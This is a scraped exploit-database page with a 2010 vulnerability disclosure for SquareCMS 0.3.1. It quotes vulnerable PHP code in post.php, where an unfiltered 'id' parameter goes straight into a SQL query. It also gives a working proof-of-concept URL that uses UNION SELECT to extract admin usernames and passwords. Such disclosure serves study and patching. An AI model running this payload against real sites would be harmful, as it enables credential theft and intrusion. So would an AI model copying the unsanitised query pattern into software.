Home / os / win7

[webapps / 0day] - SquareCMS 0.3.1 (post.php) SQL Injection

Posted on 24 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>SquareCMS 0.3.1 (post.php) SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='SquareCMS 0.3.1 (post.php) SQL Injection Vulnerability by cOndemned in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================================================
SquareCMS 0.3.1 (post.php) SQL Injection Vulnerability
======================================================

found by cOndemned
vendor: http://spoolio.co.cc/
download: http://webscripts.softpedia.com/script/Content-Management/Square-CMS-66303.html
prior versions may also be affected
 
source of post.php lines 15 - 31:
 
    $token = $_GET[&#039;id&#039;];                                   // [1]
     
    if (isset($token))
    {
        if ($result = mysql_query(&quot;SELECT * FROM $posts WHERE id=$token LIMIT 1&quot;))  // [2]
        {
            if ($row = mysql_fetch_array($result, MYSQL_ASSOC))
            {
                header(&quot;Location: &quot;.get_friendly_url($row[&#039;url&#039;]));     // [3]
                exit();
            }
        }
    }
     
    header($_SERVER[&quot;SERVER_PROTOCOL&quot;].&quot; 404 Not Found&quot;); // Return a 404           // [4]
    header(&quot;Content-Type: text/plain&quot;);
    print(&quot;404 Not Found
&quot;);
 
 
description:
 
    User input from  variable token [1] is  being used in the MySQL query [2] without any
    filtration, so that there is possibility to run arbitarary sql commands.  If query is
    correct (returns proper result) user will be redirected to an url containing response
    [3]. In other case cms will force throwing 404 server response [4] ....
 
proof of concept:
 
    http://target/post.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9+from+square_settings--


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-24]</pre></body></html>

 

TOP

Malware :

Exploits :